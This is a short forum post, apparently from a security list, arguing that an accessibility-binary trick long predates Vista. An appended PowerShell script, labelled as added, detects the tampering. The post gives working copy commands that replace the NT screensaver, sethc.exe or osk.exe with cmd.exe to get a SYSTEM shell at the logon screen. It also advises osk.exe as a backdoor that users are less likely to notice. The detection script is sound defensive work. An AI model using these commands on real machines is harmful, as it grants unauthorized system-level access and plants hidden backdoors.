this is an uberlame post...
here's why...
this vulnerability is widely known since WINDOWS NT 4.0 (and yes it IS vulnerable along with win2k and xp and 2003)
the fact that he claims that only vista is vulnerable discloses that he doesn't even understand the trick...
recipe for windows nt4:
copy c:\winnt\system32\default.scr c:\winnt\system32\default.scr_ && copy c:\winnt\system32\cmd.exe c:\winnt\system32\default.scr
after the trick log off and wait 15 mins: the cmd will pop up instead of the screensaver (nt authority\system by the way).
recipe for win2k/XP/2003
copy cmd.exe to c:\windows\system32\sethc.exe
then at the login prompt push 5 times the right-shift, a cmd will pop up with a sexy sound...
(system access)
with vista/server 2008...
I'd suggest to copy cmd.exe to osk.exe (on-screen keyboard) it is less likely a user will discover the backdoor.
very very old tricks....
nicola del vacchio
mcse/cissp
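A defender-side check for the swap described in the post above, added here as an example and not part of the original post: it flags sethc.exe or osk.exe when the file has the same content as cmd.exe or carries another program's version resource. It assumes PowerShell 4.0 or later (for Get-FileHash); the function name Test-LogonHelper and the parameter names are hypothetical, and the OriginalFilename comparison is a heuristic.

```powershell
# Added example: detect logon-screen helper binaries overwritten with a shell.
# Target names come from the post above (sethc.exe, osk.exe); run as an administrator.
param(
    [string]$SystemDir = (Join-Path $env:SystemRoot 'System32')
)

$targets = 'sethc.exe', 'osk.exe'   # helpers reachable from the logon screen
$shells  = 'cmd.exe'                # content that must never sit under those names

function Test-LogonHelper {
    param([string]$Dir, [string[]]$Names, [string[]]$ShellNames)

    # Hash the shell binaries once so each target can be compared by content.
    $shellHashes = @{}
    foreach ($s in $ShellNames) {
        $p = Join-Path $Dir $s
        if (Test-Path -LiteralPath $p) {
            $shellHashes[(Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash] = $s
        }
    }

    foreach ($n in $Names) {
        $p = Join-Path $Dir $n
        if (-not (Test-Path -LiteralPath $p)) { continue }

        $hash    = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $orig    = (Get-Item -LiteralPath $p).VersionInfo.OriginalFilename
        $reasons = @()

        # Check 1: byte-identical to a shell, i.e. a plain "copy cmd.exe sethc.exe".
        if ($shellHashes.ContainsKey($hash)) {
            $reasons += "same content as $($shellHashes[$hash])"
        }
        # Check 2 (heuristic): a copied binary keeps its own version resource.
        # Some Windows versions append ".mui" to OriginalFilename, so strip it first.
        if ($orig -and (($orig -replace '\.mui$', '') -ne $n)) {
            $reasons += "OriginalFilename is '$orig'"
        }

        [pscustomobject]@{
            Path       = $p
            Suspicious = [bool]$reasons.Count
            Reasons    = $reasons -join '; '
        }
    }
}

Test-LogonHelper -Dir $SystemDir -Names $targets -ShellNames $shells |
    Format-Table -AutoSize -Wrap
```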